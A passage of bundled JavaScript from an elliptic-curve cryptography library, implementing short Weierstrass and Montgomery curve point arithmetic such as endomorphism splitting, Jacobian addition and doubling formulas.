    for(var i = 1; i < max; i++)res[i] = res[i - 1].add(dbl);
    return {
        wnd: wnd,
        points: res
    };
};
$d03ed95a59c9b218$var$BasePoint.prototype._getBeta = function _getBeta() {
    return null;
};
$d03ed95a59c9b218$var$BasePoint.prototype.dblp = function dblp(k) {
    var r = this;
    for(var i = 0; i < k; i++)r = r.dbl();
    return r;
};

});

parcelRequire.register("eYNyQ", function(module, exports) {
"use strict";

var $gEVtY = parcelRequire("gEVtY");

var $jX0xT = parcelRequire("jX0xT");

var $dlqwk = parcelRequire("dlqwk");

var $hSu7V = parcelRequire("hSu7V");
var $ae7d1d0c45b43ec6$var$assert = $gEVtY.assert;
function $ae7d1d0c45b43ec6$var$ShortCurve(conf) {
    $hSu7V.call(this, "short", conf);
    this.a = new $jX0xT(conf.a, 16).toRed(this.red);
    this.b = new $jX0xT(conf.b, 16).toRed(this.red);
    this.tinv = this.two.redInvm();
    this.zeroA = this.a.fromRed().cmpn(0) === 0;
    this.threeA = this.a.fromRed().sub(this.p).cmpn(-3) === 0;
    // If the curve is endomorphic, precalculate beta and lambda
    this.endo = this._getEndomorphism(conf);
    this._endoWnafT1 = new Array(4);
    this._endoWnafT2 = new Array(4);
}
$dlqwk($ae7d1d0c45b43ec6$var$ShortCurve, $hSu7V);
module.exports = $ae7d1d0c45b43ec6$var$ShortCurve;
$ae7d1d0c45b43ec6$var$ShortCurve.prototype._getEndomorphism = function _getEndomorphism(conf) {
    // No efficient endomorphism
    if (!this.zeroA || !this.g || !this.n || this.p.modn(3) !== 1) return;
    // Compute beta and lambda, that lambda * P = (beta * Px; Py)
    var beta;
    var lambda;
    if (conf.beta) beta = new $jX0xT(conf.beta, 16).toRed(this.red);
    else {
        var betas = this._getEndoRoots(this.p);
        // Choose the smallest beta
        beta = betas[0].cmp(betas[1]) < 0 ? betas[0] : betas[1];
        beta = beta.toRed(this.red);
    }
    if (conf.lambda) lambda = new $jX0xT(conf.lambda, 16);
    else {
        // Choose the lambda that is matching selected beta
        var lambdas = this._getEndoRoots(this.n);
        if (this.g.mul(lambdas[0]).x.cmp(this.g.x.redMul(beta)) === 0) lambda = lambdas[0];
        else {
            lambda = lambdas[1];
            $ae7d1d0c45b43ec6$var$assert(this.g.mul(lambda).x.cmp(this.g.x.redMul(beta)) === 0);
        }
    }
    // Get basis vectors, used for balanced length-two representation
    var basis;
    if (conf.basis) basis = conf.basis.map(function(vec) {
        return {
            a: new $jX0xT(vec.a, 16),
            b: new $jX0xT(vec.b, 16)
        };
    });
    else basis = this._getEndoBasis(lambda);
    return {
        beta: beta,
        lambda: lambda,
        basis: basis
    };
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype._getEndoRoots = function _getEndoRoots(num) {
    // Find roots of for x^2 + x + 1 in F
    // Root = (-1 +- Sqrt(-3)) / 2
    //
    var red = num === this.p ? this.red : $jX0xT.mont(num);
    var tinv = new $jX0xT(2).toRed(red).redInvm();
    var ntinv = tinv.redNeg();
    var s = new $jX0xT(3).toRed(red).redNeg().redSqrt().redMul(tinv);
    var l1 = ntinv.redAdd(s).fromRed();
    var l2 = ntinv.redSub(s).fromRed();
    return [
        l1,
        l2
    ];
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype._getEndoBasis = function _getEndoBasis(lambda) {
    // aprxSqrt >= sqrt(this.n)
    var aprxSqrt = this.n.ushrn(Math.floor(this.n.bitLength() / 2));
    // 3.74
    // Run EGCD, until r(L + 1) < aprxSqrt
    var u = lambda;
    var v = this.n.clone();
    var x1 = new $jX0xT(1);
    var y1 = new $jX0xT(0);
    var x2 = new $jX0xT(0);
    var y2 = new $jX0xT(1);
    // NOTE: all vectors are roots of: a + b * lambda = 0 (mod n)
    var a0;
    var b0;
    // First vector
    var a1;
    var b1;
    // Second vector
    var a2;
    var b2;
    var prevR;
    var i = 0;
    var r;
    var x;
    while(u.cmpn(0) !== 0){
        var q = v.div(u);
        r = v.sub(q.mul(u));
        x = x2.sub(q.mul(x1));
        var y = y2.sub(q.mul(y1));
        if (!a1 && r.cmp(aprxSqrt) < 0) {
            a0 = prevR.neg();
            b0 = x1;
            a1 = r.neg();
            b1 = x;
        } else if (a1 && ++i === 2) break;
        prevR = r;
        v = u;
        u = r;
        x2 = x1;
        x1 = x;
        y2 = y1;
        y1 = y;
    }
    a2 = r.neg();
    b2 = x;
    var len1 = a1.sqr().add(b1.sqr());
    var len2 = a2.sqr().add(b2.sqr());
    if (len2.cmp(len1) >= 0) {
        a2 = a0;
        b2 = b0;
    }
    // Normalize signs
    if (a1.negative) {
        a1 = a1.neg();
        b1 = b1.neg();
    }
    if (a2.negative) {
        a2 = a2.neg();
        b2 = b2.neg();
    }
    return [
        {
            a: a1,
            b: b1
        },
        {
            a: a2,
            b: b2
        }
    ];
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype._endoSplit = function _endoSplit(k) {
    var basis = this.endo.basis;
    var v1 = basis[0];
    var v2 = basis[1];
    var c1 = v2.b.mul(k).divRound(this.n);
    var c2 = v1.b.neg().mul(k).divRound(this.n);
    var p1 = c1.mul(v1.a);
    var p2 = c2.mul(v2.a);
    var q1 = c1.mul(v1.b);
    var q2 = c2.mul(v2.b);
    // Calculate answer
    var k1 = k.sub(p1).sub(p2);
    var k2 = q1.add(q2).neg();
    return {
        k1: k1,
        k2: k2
    };
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype.pointFromX = function pointFromX(x, odd) {
    x = new $jX0xT(x, 16);
    if (!x.red) x = x.toRed(this.red);
    var y2 = x.redSqr().redMul(x).redIAdd(x.redMul(this.a)).redIAdd(this.b);
    var y = y2.redSqrt();
    if (y.redSqr().redSub(y2).cmp(this.zero) !== 0) throw new Error("invalid point");
    // XXX Is there any way to tell if the number is odd without converting it
    // to non-red form?
    var isOdd = y.fromRed().isOdd();
    if (odd && !isOdd || !odd && isOdd) y = y.redNeg();
    return this.point(x, y);
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype.validate = function validate(point) {
    if (point.inf) return true;
    var x = point.x;
    var y = point.y;
    var ax = this.a.redMul(x);
    var rhs = x.redSqr().redMul(x).redIAdd(ax).redIAdd(this.b);
    return y.redSqr().redISub(rhs).cmpn(0) === 0;
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype._endoWnafMulAdd = function _endoWnafMulAdd(points, coeffs, jacobianResult) {
    var npoints = this._endoWnafT1;
    var ncoeffs = this._endoWnafT2;
    for(var i = 0; i < points.length; i++){
        var split = this._endoSplit(coeffs[i]);
        var p = points[i];
        var beta = p._getBeta();
        if (split.k1.negative) {
            split.k1.ineg();
            p = p.neg(true);
        }
        if (split.k2.negative) {
            split.k2.ineg();
            beta = beta.neg(true);
        }
        npoints[i * 2] = p;
        npoints[i * 2 + 1] = beta;
        ncoeffs[i * 2] = split.k1;
        ncoeffs[i * 2 + 1] = split.k2;
    }
    var res = this._wnafMulAdd(1, npoints, ncoeffs, i * 2, jacobianResult);
    // Clean-up references to points and coefficients
    for(var j = 0; j < i * 2; j++){
        npoints[j] = null;
        ncoeffs[j] = null;
    }
    return res;
};
function $ae7d1d0c45b43ec6$var$Point(curve, x, y, isRed) {
    $hSu7V.BasePoint.call(this, curve, "affine");
    if (x === null && y === null) {
        this.x = null;
        this.y = null;
        this.inf = true;
    } else {
        this.x = new $jX0xT(x, 16);
        this.y = new $jX0xT(y, 16);
        // Force redgomery representation when loading from JSON
        if (isRed) {
            this.x.forceRed(this.curve.red);
            this.y.forceRed(this.curve.red);
        }
        if (!this.x.red) this.x = this.x.toRed(this.curve.red);
        if (!this.y.red) this.y = this.y.toRed(this.curve.red);
        this.inf = false;
    }
}
$dlqwk($ae7d1d0c45b43ec6$var$Point, $hSu7V.BasePoint);
$ae7d1d0c45b43ec6$var$ShortCurve.prototype.point = function point(x, y, isRed) {
    return new $ae7d1d0c45b43ec6$var$Point(this, x, y, isRed);
};
$ae7d1d0c45b43ec6$var$ShortCurve.prototype.pointFromJSON = function pointFromJSON(obj, red) {
    return $ae7d1d0c45b43ec6$var$Point.fromJSON(this, obj, red);
};
$ae7d1d0c45b43ec6$var$Point.prototype._getBeta = function _getBeta() {
    if (!this.curve.endo) return;
    var pre = this.precomputed;
    if (pre && pre.beta) return pre.beta;
    var beta = this.curve.point(this.x.redMul(this.curve.endo.beta), this.y);
    if (pre) {
        var curve = this.curve;
        var endoMul = function(p) {
            return curve.point(p.x.redMul(curve.endo.beta), p.y);
        };
        pre.beta = beta;
        beta.precomputed = {
            beta: null,
            naf: pre.naf && {
                wnd: pre.naf.wnd,
                points: pre.naf.points.map(endoMul)
            },
            doubles: pre.doubles && {
                step: pre.doubles.step,
                points: pre.doubles.points.map(endoMul)
            }
        };
    }
    return beta;
};
$ae7d1d0c45b43ec6$var$Point.prototype.toJSON = function toJSON() {
    if (!this.precomputed) return [
        this.x,
        this.y
    ];
    return [
        this.x,
        this.y,
        this.precomputed && {
            doubles: this.precomputed.doubles && {
                step: this.precomputed.doubles.step,
                points: this.precomputed.doubles.points.slice(1)
            },
            naf: this.precomputed.naf && {
                wnd: this.precomputed.naf.wnd,
                points: this.precomputed.naf.points.slice(1)
            }
        }
    ];
};
$ae7d1d0c45b43ec6$var$Point.fromJSON = function fromJSON(curve, obj, red) {
    if (typeof obj === "string") obj = JSON.parse(obj);
    var res = curve.point(obj[0], obj[1], red);
    if (!obj[2]) return res;
    function obj2point(obj) {
        return curve.point(obj[0], obj[1], red);
    }
    var pre = obj[2];
    res.precomputed = {
        beta: null,
        doubles: pre.doubles && {
            step: pre.doubles.step,
            points: [
                res
            ].concat(pre.doubles.points.map(obj2point))
        },
        naf: pre.naf && {
            wnd: pre.naf.wnd,
            points: [
                res
            ].concat(pre.naf.points.map(obj2point))
        }
    };
    return res;
};
$ae7d1d0c45b43ec6$var$Point.prototype.inspect = function inspect() {
    if (this.isInfinity()) return "<EC Point Infinity>";
    return "<EC Point x: " + this.x.fromRed().toString(16, 2) + " y: " + this.y.fromRed().toString(16, 2) + ">";
};
$ae7d1d0c45b43ec6$var$Point.prototype.isInfinity = function isInfinity() {
    return this.inf;
};
$ae7d1d0c45b43ec6$var$Point.prototype.add = function add(p) {
    // O + P = P
    if (this.inf) return p;
    // P + O = P
    if (p.inf) return this;
    // P + P = 2P
    if (this.eq(p)) return this.dbl();
    // P + (-P) = O
    if (this.neg().eq(p)) return this.curve.point(null, null);
    // P + Q = O
    if (this.x.cmp(p.x) === 0) return this.curve.point(null, null);
    var c = this.y.redSub(p.y);
    if (c.cmpn(0) !== 0) c = c.redMul(this.x.redSub(p.x).redInvm());
    var nx = c.redSqr().redISub(this.x).redISub(p.x);
    var ny = c.redMul(this.x.redSub(nx)).redISub(this.y);
    return this.curve.point(nx, ny);
};
$ae7d1d0c45b43ec6$var$Point.prototype.dbl = function dbl() {
    if (this.inf) return this;
    // 2P = O
    var ys1 = this.y.redAdd(this.y);
    if (ys1.cmpn(0) === 0) return this.curve.point(null, null);
    var a = this.curve.a;
    var x2 = this.x.redSqr();
    var dyinv = ys1.redInvm();
    var c = x2.redAdd(x2).redIAdd(x2).redIAdd(a).redMul(dyinv);
    var nx = c.redSqr().redISub(this.x.redAdd(this.x));
    var ny = c.redMul(this.x.redSub(nx)).redISub(this.y);
    return this.curve.point(nx, ny);
};
$ae7d1d0c45b43ec6$var$Point.prototype.getX = function getX() {
    return this.x.fromRed();
};
$ae7d1d0c45b43ec6$var$Point.prototype.getY = function getY() {
    return this.y.fromRed();
};
$ae7d1d0c45b43ec6$var$Point.prototype.mul = function mul(k) {
    k = new $jX0xT(k, 16);
    if (this.isInfinity()) return this;
    else if (this._hasDoubles(k)) return this.curve._fixedNafMul(this, k);
    else if (this.curve.endo) return this.curve._endoWnafMulAdd([
        this
    ], [
        k
    ]);
    else return this.curve._wnafMul(this, k);
};
$ae7d1d0c45b43ec6$var$Point.prototype.mulAdd = function mulAdd(k1, p2, k2) {
    var points = [
        this,
        p2
    ];
    var coeffs = [
        k1,
        k2
    ];
    if (this.curve.endo) return this.curve._endoWnafMulAdd(points, coeffs);
    else return this.curve._wnafMulAdd(1, points, coeffs, 2);
};
$ae7d1d0c45b43ec6$var$Point.prototype.jmulAdd = function jmulAdd(k1, p2, k2) {
    var points = [
        this,
        p2
    ];
    var coeffs = [
        k1,
        k2
    ];
    if (this.curve.endo) return this.curve._endoWnafMulAdd(points, coeffs, true);
    else return this.curve._wnafMulAdd(1, points, coeffs, 2, true);
};
$ae7d1d0c45b43ec6$var$Point.prototype.eq = function eq(p) {
    return this === p || this.inf === p.inf && (this.inf || this.x.cmp(p.x) === 0 && this.y.cmp(p.y) === 0);
};
$ae7d1d0c45b43ec6$var$Point.prototype.neg = function neg(_precompute) {
    if (this.inf) return this;
    var res = this.curve.point(this.x, this.y.redNeg());
    if (_precompute && this.precomputed) {
        var pre = this.precomputed;
        var negate = function(p) {
            return p.neg();
        };
        res.precomputed = {
            naf: pre.naf && {
                wnd: pre.naf.wnd,
                points: pre.naf.points.map(negate)
            },
            doubles: pre.doubles && {
                step: pre.doubles.step,
                points: pre.doubles.points.map(negate)
            }
        };
    }
    return res;
};
$ae7d1d0c45b43ec6$var$Point.prototype.toJ = function toJ() {
    if (this.inf) return this.curve.jpoint(null, null, null);
    var res = this.curve.jpoint(this.x, this.y, this.curve.one);
    return res;
};
function $ae7d1d0c45b43ec6$var$JPoint(curve, x, y, z) {
    $hSu7V.BasePoint.call(this, curve, "jacobian");
    if (x === null && y === null && z === null) {
        this.x = this.curve.one;
        this.y = this.curve.one;
        this.z = new $jX0xT(0);
    } else {
        this.x = new $jX0xT(x, 16);
        this.y = new $jX0xT(y, 16);
        this.z = new $jX0xT(z, 16);
    }
    if (!this.x.red) this.x = this.x.toRed(this.curve.red);
    if (!this.y.red) this.y = this.y.toRed(this.curve.red);
    if (!this.z.red) this.z = this.z.toRed(this.curve.red);
    this.zOne = this.z === this.curve.one;
}
$dlqwk($ae7d1d0c45b43ec6$var$JPoint, $hSu7V.BasePoint);
$ae7d1d0c45b43ec6$var$ShortCurve.prototype.jpoint = function jpoint(x, y, z) {
    return new $ae7d1d0c45b43ec6$var$JPoint(this, x, y, z);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.toP = function toP() {
    if (this.isInfinity()) return this.curve.point(null, null);
    var zinv = this.z.redInvm();
    var zinv2 = zinv.redSqr();
    var ax = this.x.redMul(zinv2);
    var ay = this.y.redMul(zinv2).redMul(zinv);
    return this.curve.point(ax, ay);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.neg = function neg() {
    return this.curve.jpoint(this.x, this.y.redNeg(), this.z);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.add = function add(p) {
    // O + P = P
    if (this.isInfinity()) return p;
    // P + O = P
    if (p.isInfinity()) return this;
    // 12M + 4S + 7A
    var pz2 = p.z.redSqr();
    var z2 = this.z.redSqr();
    var u1 = this.x.redMul(pz2);
    var u2 = p.x.redMul(z2);
    var s1 = this.y.redMul(pz2.redMul(p.z));
    var s2 = p.y.redMul(z2.redMul(this.z));
    var h = u1.redSub(u2);
    var r = s1.redSub(s2);
    if (h.cmpn(0) === 0) {
        if (r.cmpn(0) !== 0) return this.curve.jpoint(null, null, null);
        else return this.dbl();
    }
    var h2 = h.redSqr();
    var h3 = h2.redMul(h);
    var v = u1.redMul(h2);
    var nx = r.redSqr().redIAdd(h3).redISub(v).redISub(v);
    var ny = r.redMul(v.redISub(nx)).redISub(s1.redMul(h3));
    var nz = this.z.redMul(p.z).redMul(h);
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.mixedAdd = function mixedAdd(p) {
    // O + P = P
    if (this.isInfinity()) return p.toJ();
    // P + O = P
    if (p.isInfinity()) return this;
    // 8M + 3S + 7A
    var z2 = this.z.redSqr();
    var u1 = this.x;
    var u2 = p.x.redMul(z2);
    var s1 = this.y;
    var s2 = p.y.redMul(z2).redMul(this.z);
    var h = u1.redSub(u2);
    var r = s1.redSub(s2);
    if (h.cmpn(0) === 0) {
        if (r.cmpn(0) !== 0) return this.curve.jpoint(null, null, null);
        else return this.dbl();
    }
    var h2 = h.redSqr();
    var h3 = h2.redMul(h);
    var v = u1.redMul(h2);
    var nx = r.redSqr().redIAdd(h3).redISub(v).redISub(v);
    var ny = r.redMul(v.redISub(nx)).redISub(s1.redMul(h3));
    var nz = this.z.redMul(h);
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.dblp = function dblp(pow) {
    if (pow === 0) return this;
    if (this.isInfinity()) return this;
    if (!pow) return this.dbl();
    var i;
    if (this.curve.zeroA || this.curve.threeA) {
        var r = this;
        for(i = 0; i < pow; i++)r = r.dbl();
        return r;
    }
    // 1M + 2S + 1A + N * (4S + 5M + 8A)
    // N = 1 => 6M + 6S + 9A
    var a = this.curve.a;
    var tinv = this.curve.tinv;
    var jx = this.x;
    var jy = this.y;
    var jz = this.z;
    var jz4 = jz.redSqr().redSqr();
    // Reuse results
    var jyd = jy.redAdd(jy);
    for(i = 0; i < pow; i++){
        var jx2 = jx.redSqr();
        var jyd2 = jyd.redSqr();
        var jyd4 = jyd2.redSqr();
        var c = jx2.redAdd(jx2).redIAdd(jx2).redIAdd(a.redMul(jz4));
        var t1 = jx.redMul(jyd2);
        var nx = c.redSqr().redISub(t1.redAdd(t1));
        var t2 = t1.redISub(nx);
        var dny = c.redMul(t2);
        dny = dny.redIAdd(dny).redISub(jyd4);
        var nz = jyd.redMul(jz);
        if (i + 1 < pow) jz4 = jz4.redMul(jyd4);
        jx = nx;
        jz = nz;
        jyd = dny;
    }
    return this.curve.jpoint(jx, jyd.redMul(tinv), jz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.dbl = function dbl() {
    if (this.isInfinity()) return this;
    if (this.curve.zeroA) return this._zeroDbl();
    else if (this.curve.threeA) return this._threeDbl();
    else return this._dbl();
};
$ae7d1d0c45b43ec6$var$JPoint.prototype._zeroDbl = function _zeroDbl() {
    var nx;
    var ny;
    var nz;
    // Z = 1
    if (this.zOne) {
        // hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html
        //     #doubling-mdbl-2007-bl
        // 1M + 5S + 14A
        // XX = X1^2
        var xx = this.x.redSqr();
        // YY = Y1^2
        var yy = this.y.redSqr();
        // YYYY = YY^2
        var yyyy = yy.redSqr();
        // S = 2 * ((X1 + YY)^2 - XX - YYYY)
        var s = this.x.redAdd(yy).redSqr().redISub(xx).redISub(yyyy);
        s = s.redIAdd(s);
        // M = 3 * XX + a; a = 0
        var m = xx.redAdd(xx).redIAdd(xx);
        // T = M ^ 2 - 2*S
        var t = m.redSqr().redISub(s).redISub(s);
        // 8 * YYYY
        var yyyy8 = yyyy.redIAdd(yyyy);
        yyyy8 = yyyy8.redIAdd(yyyy8);
        yyyy8 = yyyy8.redIAdd(yyyy8);
        // X3 = T
        nx = t;
        // Y3 = M * (S - T) - 8 * YYYY
        ny = m.redMul(s.redISub(t)).redISub(yyyy8);
        // Z3 = 2*Y1
        nz = this.y.redAdd(this.y);
    } else {
        // hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html
        //     #doubling-dbl-2009-l
        // 2M + 5S + 13A
        // A = X1^2
        var a = this.x.redSqr();
        // B = Y1^2
        var b = this.y.redSqr();
        // C = B^2
        var c = b.redSqr();
        // D = 2 * ((X1 + B)^2 - A - C)
        var d = this.x.redAdd(b).redSqr().redISub(a).redISub(c);
        d = d.redIAdd(d);
        // E = 3 * A
        var e = a.redAdd(a).redIAdd(a);
        // F = E^2
        var f = e.redSqr();
        // 8 * C
        var c8 = c.redIAdd(c);
        c8 = c8.redIAdd(c8);
        c8 = c8.redIAdd(c8);
        // X3 = F - 2 * D
        nx = f.redISub(d).redISub(d);
        // Y3 = E * (D - X3) - 8 * C
        ny = e.redMul(d.redISub(nx)).redISub(c8);
        // Z3 = 2 * Y1 * Z1
        nz = this.y.redMul(this.z);
        nz = nz.redIAdd(nz);
    }
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype._threeDbl = function _threeDbl() {
    var nx;
    var ny;
    var nz;
    // Z = 1
    if (this.zOne) {
        // hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html
        //     #doubling-mdbl-2007-bl
        // 1M + 5S + 15A
        // XX = X1^2
        var xx = this.x.redSqr();
        // YY = Y1^2
        var yy = this.y.redSqr();
        // YYYY = YY^2
        var yyyy = yy.redSqr();
        // S = 2 * ((X1 + YY)^2 - XX - YYYY)
        var s = this.x.redAdd(yy).redSqr().redISub(xx).redISub(yyyy);
        s = s.redIAdd(s);
        // M = 3 * XX + a
        var m = xx.redAdd(xx).redIAdd(xx).redIAdd(this.curve.a);
        // T = M^2 - 2 * S
        var t = m.redSqr().redISub(s).redISub(s);
        // X3 = T
        nx = t;
        // Y3 = M * (S - T) - 8 * YYYY
        var yyyy8 = yyyy.redIAdd(yyyy);
        yyyy8 = yyyy8.redIAdd(yyyy8);
        yyyy8 = yyyy8.redIAdd(yyyy8);
        ny = m.redMul(s.redISub(t)).redISub(yyyy8);
        // Z3 = 2 * Y1
        nz = this.y.redAdd(this.y);
    } else {
        // hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html#doubling-dbl-2001-b
        // 3M + 5S
        // delta = Z1^2
        var delta = this.z.redSqr();
        // gamma = Y1^2
        var gamma = this.y.redSqr();
        // beta = X1 * gamma
        var beta = this.x.redMul(gamma);
        // alpha = 3 * (X1 - delta) * (X1 + delta)
        var alpha = this.x.redSub(delta).redMul(this.x.redAdd(delta));
        alpha = alpha.redAdd(alpha).redIAdd(alpha);
        // X3 = alpha^2 - 8 * beta
        var beta4 = beta.redIAdd(beta);
        beta4 = beta4.redIAdd(beta4);
        var beta8 = beta4.redAdd(beta4);
        nx = alpha.redSqr().redISub(beta8);
        // Z3 = (Y1 + Z1)^2 - gamma - delta
        nz = this.y.redAdd(this.z).redSqr().redISub(gamma).redISub(delta);
        // Y3 = alpha * (4 * beta - X3) - 8 * gamma^2
        var ggamma8 = gamma.redSqr();
        ggamma8 = ggamma8.redIAdd(ggamma8);
        ggamma8 = ggamma8.redIAdd(ggamma8);
        ggamma8 = ggamma8.redIAdd(ggamma8);
        ny = alpha.redMul(beta4.redISub(nx)).redISub(ggamma8);
    }
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype._dbl = function _dbl() {
    var a = this.curve.a;
    // 4M + 6S + 10A
    var jx = this.x;
    var jy = this.y;
    var jz = this.z;
    var jz4 = jz.redSqr().redSqr();
    var jx2 = jx.redSqr();
    var jy2 = jy.redSqr();
    var c = jx2.redAdd(jx2).redIAdd(jx2).redIAdd(a.redMul(jz4));
    var jxd4 = jx.redAdd(jx);
    jxd4 = jxd4.redIAdd(jxd4);
    var t1 = jxd4.redMul(jy2);
    var nx = c.redSqr().redISub(t1.redAdd(t1));
    var t2 = t1.redISub(nx);
    var jyd8 = jy2.redSqr();
    jyd8 = jyd8.redIAdd(jyd8);
    jyd8 = jyd8.redIAdd(jyd8);
    jyd8 = jyd8.redIAdd(jyd8);
    var ny = c.redMul(t2).redISub(jyd8);
    var nz = jy.redAdd(jy).redMul(jz);
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.trpl = function trpl() {
    if (!this.curve.zeroA) return this.dbl().add(this);
    // hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html#tripling-tpl-2007-bl
    // 5M + 10S + ...
    // XX = X1^2
    var xx = this.x.redSqr();
    // YY = Y1^2
    var yy = this.y.redSqr();
    // ZZ = Z1^2
    var zz = this.z.redSqr();
    // YYYY = YY^2
    var yyyy = yy.redSqr();
    // M = 3 * XX + a * ZZ2; a = 0
    var m = xx.redAdd(xx).redIAdd(xx);
    // MM = M^2
    var mm = m.redSqr();
    // E = 6 * ((X1 + YY)^2 - XX - YYYY) - MM
    var e = this.x.redAdd(yy).redSqr().redISub(xx).redISub(yyyy);
    e = e.redIAdd(e);
    e = e.redAdd(e).redIAdd(e);
    e = e.redISub(mm);
    // EE = E^2
    var ee = e.redSqr();
    // T = 16*YYYY
    var t = yyyy.redIAdd(yyyy);
    t = t.redIAdd(t);
    t = t.redIAdd(t);
    t = t.redIAdd(t);
    // U = (M + E)^2 - MM - EE - T
    var u = m.redIAdd(e).redSqr().redISub(mm).redISub(ee).redISub(t);
    // X3 = 4 * (X1 * EE - 4 * YY * U)
    var yyu4 = yy.redMul(u);
    yyu4 = yyu4.redIAdd(yyu4);
    yyu4 = yyu4.redIAdd(yyu4);
    var nx = this.x.redMul(ee).redISub(yyu4);
    nx = nx.redIAdd(nx);
    nx = nx.redIAdd(nx);
    // Y3 = 8 * Y1 * (U * (T - U) - E * EE)
    var ny = this.y.redMul(u.redMul(t.redISub(u)).redISub(e.redMul(ee)));
    ny = ny.redIAdd(ny);
    ny = ny.redIAdd(ny);
    ny = ny.redIAdd(ny);
    // Z3 = (Z1 + E)^2 - ZZ - EE
    var nz = this.z.redAdd(e).redSqr().redISub(zz).redISub(ee);
    return this.curve.jpoint(nx, ny, nz);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.mul = function mul(k, kbase) {
    k = new $jX0xT(k, kbase);
    return this.curve._wnafMul(this, k);
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.eq = function eq(p) {
    if (p.type === "affine") return this.eq(p.toJ());
    if (this === p) return true;
    // x1 * z2^2 == x2 * z1^2
    var z2 = this.z.redSqr();
    var pz2 = p.z.redSqr();
    if (this.x.redMul(pz2).redISub(p.x.redMul(z2)).cmpn(0) !== 0) return false;
    // y1 * z2^3 == y2 * z1^3
    var z3 = z2.redMul(this.z);
    var pz3 = pz2.redMul(p.z);
    return this.y.redMul(pz3).redISub(p.y.redMul(z3)).cmpn(0) === 0;
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.eqXToP = function eqXToP(x) {
    var zs = this.z.redSqr();
    var rx = x.toRed(this.curve.red).redMul(zs);
    if (this.x.cmp(rx) === 0) return true;
    var xc = x.clone();
    var t = this.curve.redN.redMul(zs);
    for(;;){
        xc.iadd(this.curve.n);
        if (xc.cmp(this.curve.p) >= 0) return false;
        rx.redIAdd(t);
        if (this.x.cmp(rx) === 0) return true;
    }
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.inspect = function inspect() {
    if (this.isInfinity()) return "<EC JPoint Infinity>";
    return "<EC JPoint x: " + this.x.toString(16, 2) + " y: " + this.y.toString(16, 2) + " z: " + this.z.toString(16, 2) + ">";
};
$ae7d1d0c45b43ec6$var$JPoint.prototype.isInfinity = function isInfinity() {
    // XXX This code assumes that zero is always zero in red
    return this.z.cmpn(0) === 0;
};

});

parcelRequire.register("av2Yx", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $dlqwk = parcelRequire("dlqwk");

var $hSu7V = parcelRequire("hSu7V");

var $gEVtY = parcelRequire("gEVtY");
function $7a4f1b7c0dc1f992$var$MontCurve(conf) {
    $hSu7V.call(this, "mont", conf);
    this.a = new $jX0xT(conf.a, 16).toRed(this.red);
    this.b = new $jX0xT(conf.b, 16).toRed(this.red);
    this.i4 = new $jX0xT(4).toRed(this.red).redInvm();
    this.two = new $jX0xT(2).toRed(this.red);
    this.a24 = this.i4.redMul(this.a.redAdd(this.two));
}
$dlqwk($7a4f1b7c0dc1f992$var$MontCurve, $hSu7V);
module.exports = $7a4f1b7c0dc1f992$var$MontCurve;
$7a4f1b7c0dc1f992$var$MontCurve.prototype.validate = function validate(point) {
    var x = point.normalize().x;
    var x2 = x.redSqr();
    var rhs = x2.redMul(x).redAdd(x2.redMul(this.a)).redAdd(x);
    var y = rhs.redSqrt();
    return y.redSqr().cmp(rhs) === 0;
};
function $7a4f1b7c0dc1f992$var$Point(curve, x, z) {
    $hSu7V.BasePoint.call(this, curve, "projective");
    if (x === null && z === null) {
        this.x = this.curve.one;
        this.z = this.curve.zero;
    } else {
        this.x = new $jX0xT(x, 16);
        this.z = new $jX0xT(z, 16);
        if (!this.x.red) this.x = this.x.toRed(this.curve.red);
        if (!this.z.red) this.z = this.z.toRed(this.curve.red);
    }
}
$dlqwk($7a4f1b7c0dc1f992$var$Point, $hSu7V.BasePoint);
$7a4f1b7c0dc1f992$var$MontCurve.prototype.decodePoint = function decodePoint(bytes, enc) {
    return this.point($gEVtY.toArray(bytes, enc), 1);
};
$7a4f1b7c0dc1f992$var$MontCurve.prototype.point = function point(x, z) {
    return new $7a4f1b7c0dc1f992$var$Point(this, x, z);
};
$7a4f1b7c0dc1f992$var$MontCurve.prototype.pointFromJSON = function pointFromJSON(obj) {
    return $7a4f1b7c0dc1f992$var$Point.fromJSON(this, obj);
};
$7a4f1b7c0dc1f992$var$Point.prototype.precompute = function precompute() {
// No-op
};
$7a4f1b7c0dc1f992$var$Point.prototype._encode = function _encode() {
    return this.getX().toArray("be", this.curve.p.byteLength());
};
$7a4f1b7c0dc1f992$var$Point.fromJSON = function fromJSON(curve, obj) {
    return new $7a4f1b7c0dc1f992$var$Point(curve, obj[0], obj[1] || curve.one);
};
$7a4f1b7c0dc1f992$var$Point.prototype.inspect = function inspect() {
    if (this.isInfinity()) return "<EC Point Infinity>";
    return "<EC Point x: " + this.x.fromRed().toString(16, 2) + " z: " + this.z.fromRed().toString(16, 2) + ">";
};
$7a4f1b7c0dc1f992$var$Point.prototype.isInfinity = function isInfinity() {
    // XXX This code assumes that zero is always zero in red
    return this.z.cmpn(0) === 0;
};
$7a4f1b7c0dc1f992$var$Point.prototype.dbl = function dbl() {
